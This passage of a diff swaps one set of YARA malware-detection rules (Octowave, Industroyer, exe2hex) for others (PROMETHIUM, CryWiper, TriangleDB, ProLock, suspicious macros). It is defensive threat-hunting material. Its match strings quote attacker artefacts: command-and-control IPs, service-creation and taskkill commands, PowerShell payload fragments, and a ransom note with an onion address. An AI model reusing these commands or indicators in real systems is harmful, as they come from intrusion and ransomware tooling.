+		$s4 = "%s\\libeay32.dll" fullword wide
+		$s5 = "%s\\fprot32.exe" fullword wide
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 10000KB and 3 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Octowave_Loader_03_2025 : FILE
+rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_2 : FILE
 {
 	meta:
-		description = "Detects opcodes found in Octowave loader DLLs and WAV steganography files"
-		author = "Jai Minton (@CyberRaiju) - HuntressLabs"
-		id = "d583c416-be20-5fcf-848e-edd037e3b0d4"
-		date = "2025-03-19"
-		modified = "2025-03-21"
-		reference = "https://yaratoolkit.securitybreak.io/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_octowave_loader_mar25.yar#L1-L285"
+		description = "Detects PROMETHIUM and NEODYMIUM malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5858541b-c394-5be8-9db3-fcff66f635de"
+		date = "2016-12-14"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/8abDE6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_promethium_neodymium.yar#L29-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "266568d5f0f95cc805a833745a9e63689234ae927c2903230438c080f7ec2e56"
+		logic_hash = "2d97ee2698b6a09da7f8c6850583ec7493cc288368b98b20790dd8305521f894"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0504BFBACB6E10B81196F625F2FE37B33500E7BF65FD82D3510A2B178C6CD5BD"
-		hash2 = "3A2DB0CB9EE01549A6B660D58115D112D36A744D65705394B54D7D95287C7A74"
-		hash3 = "EB50D06057FE123D6E9F7A76D3D1A4BC5307E8F15D017BE8F6031E92136CF36A"
-		hash4 = "24715920E749B014BA05F74C96627A27355C5860A14461C106AA48A7ABA371EA"
+		hash1 = "1aef507c385a234e8b10db12852ad1bd66a04730451547b2dcb26f7fae16e01f"
 
 	strings:
-		$opcode_1 = {
-			55
-			8B EC
-			56
-			57
-			8B D1
-			33 C0
-			8B FA
-			6A 06
-			59
-			AB
-			AB
-			AB
-			AB
-			8B 45 08
-			8B FA
-			83 62 10 00
-			8B F0
-			83 62 14 00
-			F3 A5
-			83 60 10 00
-		}
-		$opcode_2 = {
-			55
-			8B EC
-			8B 55 ??
-			56
-			8B F1
-			8B 46 ??
-			8B 4E ??
-			2B C1
-			3B D0
-			77 ??
-			83 7E ?? 07
-			53
-			8D 1C 11
-			57
-			89 5E ??
-			8B FE
-			76 ??
-			8B 3E
-			8D 04 12
-			50
-			FF 75 ??
-			8D 0C 4F
-			51
-			E8 ?? ?? ?? ??
-			83 C4 0C
-			33 C0
-			66 89 04 5F
-			8B C6
-			5F
-			5B
-			EB ??
-			52
-			FF 75 ??
-			8B CE
-			FF 75 ??
-			52
-			E8 ?? ?? ?? ??
-			5E
-			5D
-			C2 08 00
-		}
-		$opcode_3 = {
-			55
-			8B EC
-			8B 4D 08
-			83 C9 ??
-			56
-			3B 4D 10
-			77 1C
-			8B 75 0C
-			8B D6
-			8B 45 10
-			D1 EA
-			2B C2
-			3B F0
-			77 0C
-			8D 04 32
-			3B C8
-			0F 42 C8
-			8B C1
-			EB 03
-		}
-		$opcode_4 = {
-			56
-			8B F1
-			8B 46 14
-			83 F8 ??
-			76 ??
-		}
-		$opcode_5 = {
-			50
-			FF 36
-			E8 ?? ?? ?? ??
-			59
-			59
-			83 66 ?? 00
-		}
-		$opcode_6 = {
-			C7 46 14 ?? 00 00 00
-			66 89 06
-			5E
-			C3
-		}
-		$opcode_7 = {
-			55
-			8B EC
-			51
-			51
-			A1 ?? ?? ?? ??
-			33 C5
-			89 45 FC
-			8B 4D 0C
-			8B 45 08
-			89 45 F8
-			81 F9 00 10 00 00
-			72 ??
-			8D 45 0C
-			50
-			8D 45 F8
-			50
-			E8 ?? ?? ?? ??
-			8B 45 F8
-			59
-			59
-		}
+		$s1 = "winasys32.exe" fullword ascii
+		$s2 = "alg32.exe" fullword ascii
+		$s3 = "wmsrv32.exe" fullword ascii
+		$s4 = "vmnat32.exe" fullword ascii
 
 	condition:
-		( uint16( 0 ) == ( 0x5a4d ) or uint32( 0 ) == 0x46464952 ) and filesize < 50000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Octowave_Loader_Supporting_File_03_2025 : FILE
+rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_3 : FILE
 {
 	meta:
-		description = "Detects supporting file used by Octowave loader containing hardcoded values"
-		author = "Jai Minton (@CyberRaiju) - HuntressLabs"
-		id = "2c81c8b8-4b4d-55c9-9285-556e8b5303bd"
-		date = "2025-03-19"
-		modified = "2025-03-21"
-		reference = "https://x.com/CyberRaiju/status/1893450184224362946?t=u0X6ST2Qgnrf-ujjphGOSg&s=19"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_octowave_loader_mar25.yar#L287-L312"
+		description = "Detects PROMETHIUM and NEODYMIUM malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bff79813-0d72-50d9-9676-794801edc34b"
+		date = "2016-12-14"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/8abDE6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_promethium_neodymium.yar#L47-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "42abd38e704a17ef81b423829c2dd356749873a5d036e43cc2746debfb3f5434"
+		logic_hash = "47595e07b59744f520cd9025bcec267384329b7687fd25842f5f7a8f4b360674"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "C4CBAA7E4521FA0ED9CC634C5E2BACBF41F46842CA4526B7904D98843A7E9DB9"
-		hash2 = "F5CFB2E634539D5DC7FFE202FFDC422EF7457100401BA1FBC21DD05558719865"
-		hash3 = "56F1967F7177C166386D864807CDF03D5BBD3F118A285CE67EA226D02E5CF58C"
-		hash4 = "11EE5AD8A81AE85E5B7DDF93ADF6EDD20DE8460C755BF0426DFCBC7F658D7E85"
-		hash5 = "D218B65493E4D9D85CBC2F7B608F4F7E501708014BC04AF27D33D995AA54A703"
-		hash6 = "0C112F9DFE27211B357C74F358D9C144EA10CC0D92D6420B8742B72A65562C5A"
+		hash1 = "2f98ac11c78ad1b4c5c5c10a88857baf7af43acb9162e8077709db9d563bcf02"
 
 	strings:
-		$unique_key = {1D 1C 1F 1E 01 01 03 02 05 04 07 06 09 D4 0E 0A 0D 0C 0F 0E 31 30 31 32 35 34 36 36 39 38 DC 3F 3D 3C 3E}
-		$unique_string = "MLONqpsrutwvyx"
-		$unique_string2 = "A@CBEDGFIHKJMLONqpsrutwvyx"
+		$s1 = "%s SslHandshakeDone(%d) %d. Secure connection with %s, cipher %s, %d secret bits (%d total), session reused=%s" fullword ascii
+		$s2 = "mvhost32.dll" fullword ascii
+		$s3 = "sdwin32.dll" fullword ascii
+		$s4 = "ofx64.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) != 0x5a4d and filesize < 10000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Industroyer_Malware_1 : FILE
+rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_4 : FILE
 {
 	meta:
-		description = "Detects Industroyer related malware"
+		description = "Detects PROMETHIUM and NEODYMIUM malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f5ab571c-03a7-538a-ada1-0930d15af5cf"
-		date = "2017-06-13"
+		id = "4e926b1c-bf10-5337-8c3a-964008a37d8b"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/x81cSy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_industroyer.yar#L12-L37"
+		reference = "https://goo.gl/8abDE6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_promethium_neodymium.yar#L65-L85"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "276b7abdf43b62c3943a8dc362e1c68b23cc505d288e4395a6ac3cb4795371f2"
+		logic_hash = "0e8bb00133a94b29c482b9785048025a62e2706f3653c1915be7b702fbfe48d6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ad23c7930dae02de1ea3c6836091b5fb3c62a89bf2bcfb83b4b39ede15904910"
-		hash2 = "018eb62e174efdcdb3af011d34b0bf2284ed1a803718fba6edffe5bc0b446b81"
+		hash1 = "15ededb19ec5ab6f03db1106d2ccdeeacacdb8cd708518d065cacb1b0d7e955d"
 
 	strings:
-		$s1 = "haslo.exe" fullword ascii
-		$s2 = "SYSTEM\\CurrentControlSet\\Services\\%ls" fullword wide
-		$s3 = "SYS_BASCON.COM" fullword wide
-		$s4 = "*.pcmt" fullword wide
-		$s5 = "*.pcmi" fullword wide
-		$x1 = { 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73
-         00 5C 00 25 00 6C 00 73 00 00 00 49 00 6D 00 61
-         00 67 00 65 00 50 00 61 00 74 00 68 00 00 00 43
-         00 3A 00 5C 00 00 00 44 00 3A 00 5C 00 00 00 45
-         00 3A 00 5C 00 00 00 }
-		$x2 = "haslo.dat\x00Crash"
+		$s1 = "c:\\windows\\temp\\winrar.exe" fullword wide
+		$s2 = "info@aadobetech.com" fullword ascii
+		$s3 = "%s\\ssleay32.dll" fullword wide
+		$s4 = "%s\\libeay32.dll" fullword wide
+		$s5 = "%s\\fprot32.exe" fullword wide
+		$s6 = "ADOBE Corp.1" fullword ascii
+		$s7 = "Adobe Flash Player1\"0 " fullword ascii
+		$s8 = "Windows Index Services" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 4 of them ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_Industroyer_Malware_2 : FILE
+rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_5 : FILE
 {
 	meta:
-		description = "Detects Industroyer related malware"
+		description = "Detects PROMETHIUM and NEODYMIUM malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0561a7bb-3b6c-5caf-9131-04924cee1e0f"
-		date = "2017-06-13"
+		id = "4bd60f61-a595-5289-9595-a7e33f265748"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/x81cSy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_industroyer.yar#L39-L77"
+		reference = "https://goo.gl/8abDE6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_promethium_neodymium.yar#L87-L105"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cda3e21c130acd76785905364416b3e8803e866dd93529da57ec980e7af081b7"
+		logic_hash = "69433fae4d51f7fd7b6f5b683f9c751d0f0352b8ed805a8177085e635eb26260"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3e3ab9674142dec46ce389e9e759b6484e847f5c1e1fc682fc638fc837c13571"
-		hash2 = "37d54e3d5e8b838f366b9c202f75fa264611a12444e62ae759c31a0d041aa6e4"
-		hash3 = "ecaf150e087ddff0ec6463c92f7f6cca23cc4fd30fe34c10b3cb7c2a6d135c77"
-		hash1 = "6d707e647427f1ff4a7a9420188a8831f433ad8c5325dc8b8cc6fc5e7f1f6f47"
+		hash1 = "a8b7e3edaa18c6127e98741503c3a2a66b7720d2abd967c94b8a5f2e99575ac5"
 
 	strings:
-		$x1 = "sc create %ls type= own start= auto error= ignore binpath= \"%ls\" displayname= \"%ls\"" fullword wide
-		$x2 = "10.15.1.69:3128" fullword wide
-		$s1 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" fullword wide
-		$s2 = "/c sc stop %s" fullword wide
-		$s3 = "sc start %ls" fullword wide
-		$s4 = "93.115.27.57" fullword wide
-		$s5 = "5.39.218.152" fullword wide
-		$s6 = "tierexe" fullword wide
-		$s7 = "comsys" fullword wide
-		$s8 = "195.16.88.6" fullword wide
-		$s9 = "TieringService" fullword wide
-		$a1 = "TEMP\x00\x00DEF" fullword wide
-		$a2 = "TEMP\x00\x00DEF-C" fullword wide
-		$a3 = "TEMP\x00\x00DEF-WS" fullword wide
-		$a4 = "TEMP\x00\x00DEF-EP" fullword wide
-		$a5 = "TEMP\x00\x00DC-2-TEMP" fullword wide
-		$a6 = "TEMP\x00\x00DC-2" fullword wide
-		$a7 = "TEMP\x00\x00CES-McA-TEMP" fullword wide
-		$a8 = "TEMP\x00\x00SRV_WSUS" fullword wide
-		$a9 = "TEMP\x00\x00SRV_DC-2" fullword wide
-		$a10 = "TEMP\x00\x00SCE-WSUS01" fullword wide
+		$s1 = "Winxsys.exe" fullword wide
+		$s2 = "%s\\ssleay32.dll" fullword wide
+		$s3 = "%s\\libeay32.dll" fullword wide
+		$s4 = "Windows Index Services" fullword wide
+		$s5 = "<F RAT" fullword ascii
+		$s6 = "WININDX-088FA840-B10D-11D3-BC36-006067709674" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) or 3 of them or 1 of ( $a* ) ) or ( 5 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and 3 of them )
 }
-rule SIGNATURE_BASE_Industroyer_Portscan_3 : FILE
+rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_6 : FILE
 {
 	meta:
-		description = "Detects Industroyer related custom port scaner"
+		description = "Detects PROMETHIUM and NEODYMIUM malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f6675466-d469-562b-9fb6-7b72bce8a726"
-		date = "2017-06-13"
+		id = "0f36eb56-39d8-536c-93ff-4a2352163612"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/x81cSy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_industroyer.yar#L79-L100"
+		reference = "https://goo.gl/8abDE6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_promethium_neodymium.yar#L107-L125"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "539a420989c178b3fa26e313d23e9f9c6804aa6dbd2d94f463ae924d46ac2851"
+		logic_hash = "6cfccb863c3ea8f3f60520b0df03eee8e3b754699aa339fea21489d34e29f47b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "893e4cca7fe58191d2f6722b383b5e8009d3885b5913dcd2e3577e5a763cdb3f"
+		hash1 = "dbd8cbbaf59d19cf7566042945e36409cd090bc711e339d3f2ec652bc26d6a03"
 
 	strings:
-		$s1 = "!ZBfamily" fullword ascii
-		$s2 = ":g/outddomo;" fullword ascii
-		$s3 = "GHIJKLMNOTST" fullword ascii
-		$d1 = "Error params Arguments!!!" fullword wide
-		$d2 = "^(.+?.exe).*\\s+-ip\\s*=\\s*(.+)\\s+-ports\\s*=\\s*(.+)$" fullword wide
-		$d3 = "Exhample:App.exe -ip= 127.0.0.1-100," fullword wide
-		$d4 = "Error IP Range %ls - %ls" fullword wide
-		$d5 = "Can't closesocket." fullword wide
+		$s1 = "c:\\Windows\\system32\\syswindxr32.dll" fullword wide
+		$s2 = "c:\\windows\\temp\\TrueCrypt-7.2.exe" fullword wide
+		$s3 = "%s\\ssleay32.dll" fullword wide
+		$s4 = "%s\\libeay32.dll" fullword wide
+		$s5 = "%s\\fprot32.exe" fullword wide
+		$s6 = "Windows Index Services" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of ( $s* ) or 2 of ( $d* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 7000KB and 4 of them )
 }
-rule SIGNATURE_BASE_Industroyer_Portscan_3_Output
+rule SIGNATURE_BASE_APT_Crywiper_Dec22
 {
 	meta:
-		description = "Detects Industroyer related custom port scaner output file"
+		description = "Detects CryWiper malware samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4469f056-674c-5a44-84a5-12a65b8586d5"
-		date = "2017-06-13"
+		id = "d56ccf4e-30ba-5308-ad68-ffc2ae5a1718"
+		date = "2022-12-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/x81cSy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_industroyer.yar#L102-L115"
+		reference = "https://securelist-ru.translate.goog/novyj-troyanec-crywiper/106114/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ru_crywiper.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6a2fc7b66b1e93f523e08e12ba420d261bae198918bb09eac1a7cdecc04a6737"
+		logic_hash = "7c22e02ed996cd820ed87a0c5d50e3264629cdd887aad4ea466cadeccaee2b2f"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "WSA library load complite." fullword ascii
-		$s2 = "Connection refused" fullword ascii
+		$x1 = "Software\\Sysinternals\\BrowserUpdate"
+		$sx1 = "taskkill.exe /f /im MSExchange*"
+		$s1 = "SYSTEM\\CurrentControlSet\\Control\\Terminal Server" ascii
+		$s2 = "fDenyTSConnections" ascii
 
 	condition:
-		all of them
+		1 of ( $x* ) or all of ( $s* )
 }
-rule SIGNATURE_BASE_Industroyer_Malware_4 : FILE
+rule SIGNATURE_BASE_APT_Equation_Group_Op_Triangulation_Triangledb_Implant_Jun23_1 : FILE
 {
 	meta:
-		description = "Detects Industroyer related malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f197d2a5-eecb-51ed-b991-7643efb3f749"
-		date = "2017-06-13"
+		description = "Detects TriangleDB implant found being used in Operation Triangulation on iOS devices (maybe also used on macOS systems)"
+		author = "Florian Roth"
+		id = "d81a5103-41c8-5dba-a560-8fb5514f6c0a"
+		date = "2023-06-21"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/x81cSy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_industroyer.yar#L117-L134"
+		reference = "https://securelist.com/triangledb-triangulation-implant/110050/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_triangulation_jun23.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cb850445eaf3e1a6c9a9d6c453ed0f6729a95a671a01ce8fbaddf15599e4f2ba"
-		score = 75
+		logic_hash = "486b19ddb8b182dbba882359f7eb416735e76f9cda5aea1b290fb5c6b44960c5"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "21c1fdd6cfd8ec3ffe3e922f944424b543643dbdab99fa731556f8805b0d5561"
 
 	strings:
-		$s1 = "haslo.dat" fullword wide
-		$s2 = "defragsvc" fullword ascii
-		$a1 = { 00 2E 00 64 00 61 00 74 00 00 00 43 72 61 73 68 00 00 00 }
+		$s1 = "unmungeHexString" ascii fullword
+		$s2 = "CRPwrInfo" ascii fullword
+		$s3 = "CRConfig" ascii fullword
+		$s4 = "CRXConfigureDBServer" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of ( $s* ) or $a1 )
+		( uint16( 0 ) == 0xfacf and filesize < 30MB and $s1 and 2 of them ) or all of them
 }
-rule SIGNATURE_BASE_Industroyer_Malware_5 : FILE
+rule SIGNATURE_BASE_MAL_Prolock_Malware : FILE
 {
 	meta:
-		description = "Detects Industroyer related malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "52ce21a0-0c72-585c-a805-c5077a7445af"
-		date = "2017-06-13"
+		description = "Detects Prolock malware in encrypted and decrypted mode"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "269bf0c5-8315-5405-8e44-e2cc5507a36a"
+		date = "2020-05-17"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/x81cSy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_industroyer.yar#L136-L158"
+		reference = "https://raw.githubusercontent.com/fboldewin/YARA-rules/master/Prolock.Malware.yar"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_prolock.yar#L1-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9dfd3cfc724f0dfe090b1bcbf03b9ebd0d01b3d781f833a8ca6ba1451a63d5ad"
+		logic_hash = "da8a0ec683475019daddd4acdd00d4c36eedacad3deef2be4220b86cbf5f9df0"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7907dd95c1d36cf3dc842a1bd804f0db511a0f68f4b3d382c23a3c974a383cad"
+		hash1 = "a6ded68af5a6e5cc8c1adee029347ec72da3b10a439d98f79f4b15801abd7af0"
+		hash2 = "dfbd62a3d1b239601e17a5533e5cef53036647901f3fb72be76d92063e279178"
 
 	strings:
-		$x1 = "D2MultiCommService.exe" fullword ascii
-		$x2 = "Crash104.dll" fullword ascii
-		$x3 = "iec104.log" fullword ascii
-		$x4 = "IEC-104 client: ip=%s; port=%s; ASDU=%u " fullword ascii
-		$s1 = "Error while getaddrinfo executing: %d" fullword ascii
-		$s2 = "return info-Remote command" fullword ascii
-		$s3 = "Error killing process ..." fullword ascii
-		$s4 = "stop_comm_service_name" fullword ascii
-		$s5 = "*1* Data exchange: Send: %d (%s)" fullword ascii
+		$DecryptionRoutine = {01 C2 31 DB B8 ?? ?? ?? ?? 31 04 1A 81 3C 1A}
+		$DecryptedString1 = "support981723721@protonmail.com" nocase ascii
+		$DecryptedString2 = "Your files have been encrypted by ProLock Ransomware" nocase ascii
+		$DecryptedString3 = "msaoyrayohnp32tcgwcanhjouetb5k54aekgnwg7dcvtgtecpumrxpqd.onion" nocase ascii
+		$CryptoCode = {B8 63 51 E1 B7 31 D2 8D BE ?? ?? ?? ?? B9 63 51 E1 B7 81 C1 B9 79 37 9E}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 4 of them ) ) or ( all of them )
+		(( uint16( 0 ) == 0x5A4D ) or ( uint16( 0 ) == 0x4D42 ) ) and filesize < 100KB and ( ( $DecryptionRoutine ) or ( 1 of ( $DecryptedString* ) and $CryptoCode ) )
 }
-rule SIGNATURE_BASE_Payload_Exe2Hex
+rule SIGNATURE_BASE_SUSP_VHD_Suspicious_Small_Size : FILE
 {
 	meta:
-		description = "Detects payload generated by exe2hex"
+		description = "Detects suspicious VHD files"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c29e4937-cc6a-5265-a3b9-1018228dc956"
-		date = "2016-01-15"
-		modified = "2023-12-05"
-		reference = "https://github.com/g0tmi1k/exe2hex"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_exe2hex_payload.yar#L8-L28"
+		id = "f4a72e7b-ddd3-5038-9440-1e81dc27755d"
+		date = "2019-12-21"
+		modified = "2023-01-27"
+		reference = "https://twitter.com/MeltX0R/status/1208095892877774850"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_vhd_anomaly.yar#L2-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "91b738f0174a267bbc900d59abcb504d2ae0bac8c287c3b7d1ebfc57374a7ee7"
-		score = 70
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "0bd5b113714854feaa89d52d4bab6a4a00f0dcb7fd816fa7b036eb43d3ea0dd8"
+		score = 50
+		quality = 83
+		tags = "FILE"
+		hash1 = "3382a75bd959d2194c4b1a8885df93e8770f4ebaeaff441a5180ceadf1656cd9"
 
 	strings:
-		$a1 = "set /p \"=4d5a" ascii
-		$a2 = "powershell -Command \"$hex=" ascii
-		$b1 = "set+%2Fp+%22%3D4d5" ascii
-		$b2 = "powershell+-Command+%22%24hex" ascii
-		$c1 = "echo 4d 5a " ascii
-		$c2 = "echo r cx >>" ascii
-		$d1 = "echo+4d+5a+" ascii
-		$d2 = "echo+r+cx+%3E%3E" ascii
+		$hc1 = { 63 6F 6E 65 63 74 69 78 }
+		$hc2a = { 49 6E 76 61 6C 69 64 20 70 61 72 74 69 74 69 6F
+               6E 20 74 61 62 6C 65 00 45 72 72 6F 72 20 6C 6F
+               61 64 69 6E 67 20 6F 70 65 72 61 74 69 6E 67 20
+               73 79 73 74 65 6D 00 4D 69 73 73 69 6E 67 20 6F
+               70 65 72 61 74 69 6E 67 20 73 79 73 74 65 6D }
+		$hc2b = "connectix"
 
 	condition:
-		all of ( $a* ) or all of ( $b* ) or all of ( $c* ) or all of ( $d* )
+		not uint16( 0 ) == 0x5a4d and filesize > 1KB and filesize <= 4000KB and ( $hc1 at 0 or all of ( $hc2* ) )
 }
+rule SIGNATURE_BASE_SUSP_Macro_Staroffice : FILE
+{
+	meta:
+		description = "Suspicious macro in StarOffice"
+		author = "John Lambert @JohnLaTwC"
+		id = "92110a87-66b4-5fc5-b3f5-3e59ec2671b2"
+		date = "2019-02-06"
+		modified = "2021-05-27"
+		reference = "https://twitter.com/JohnLaTwC/status/1093259873993732096"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_macro_staroffice_suspicious.yar#L1-L38"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "49385335488fa0a598ed48203d9483c5c2f53ae287e003a8cf7d64d56280e62a"
+		score = 60
+		quality = 81
+		tags = "FILE"
+		hash1 = "8495d37825dab8744f7d2c8049fc6b70b1777b9184f0abe69ce314795480ce39"
+		hash2 = "25b4214da1189fd30d3de7c538aa8b606f22c79e50444e5733fb1c6d23d71fbe"
+		hash3 = "322f314102f67a16587ab48a0f75dfaf27e4b044ffdc3b88578351c05b4f39db"
+		hash4 = "705429725437f7e0087a6159708df97992abaadff0fa48fdf25111d34a3e2f20"
+		hash5 = "7141d94e827d3b24810813d6b2e3fb851da0ee2958ef347154bc28153b23874a"
+		hash6 = "7c0e85c0a4d96080ca341d3496743f0f113b17613660812d40413be6d453eab4"
+		hash7 = "8d59f1e2abcab9efb7f833d478d1d1390e7456092f858b656ee0024daf3d1aa3"
+		hash8 = "9846b942d9d1e276c95361180e9326593ea46d3abcce9c116c204954bbfe3fdc"
+		hash9 = "aa0c83f339c8c16ad21dec41e4605d4e327adbbb78827dcad250ed64d2ceef1c"
+		hash10 = "b0be54c7210b06e60112a119c235e23c9edbe40b1c1ce1877534234f82b6b302"
+		hash11 = "bf581ebb96b8ca4f254ab4d200f9a053aff8187715573d9a1cbd443df0f554e3"
+		hash12 = "de45634064af31cb6768e4912cac284a76a6e66d398993df1aeee8ce26e0733b"
 
-rule SIGNATURE_BASE_APT_TA18_149A_Joanap_Sample1 : FILE
+	strings:
+		$r1 = "StarBasic"
+		$r2 = "</script:module>"
+		$s1 = "Shell" nocase
+		$s2 = ".Run" nocase
+		$s3 = ".PutInClipboard" nocase
+		$s4 = "powershell" nocase
+		$fp1 = "LibreOffice project" ascii
+
+	condition:
+		filesize < 1MB and uint32be( 0 ) == 0x3c3f786d and all of ( $r* ) and 1 of ( $s* ) and not 1 of ( $fp* )
+}
+rule SIGNATURE_BASE_Waterbear_1_Jun17 : FILE
 {
 	meta:
-		description = "Detects malware from TA18-149A report by US-CERT"
+		description = "Detects malware from Operation Waterbear"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a3a4f9a6-367d-5d99-bffb-f4ff03fa4a09"
-		date = "2018-05-30"
+		id = "2202506a-6009-5321-a8b2-df3bff51d06f"
+		date = "2017-06-23"
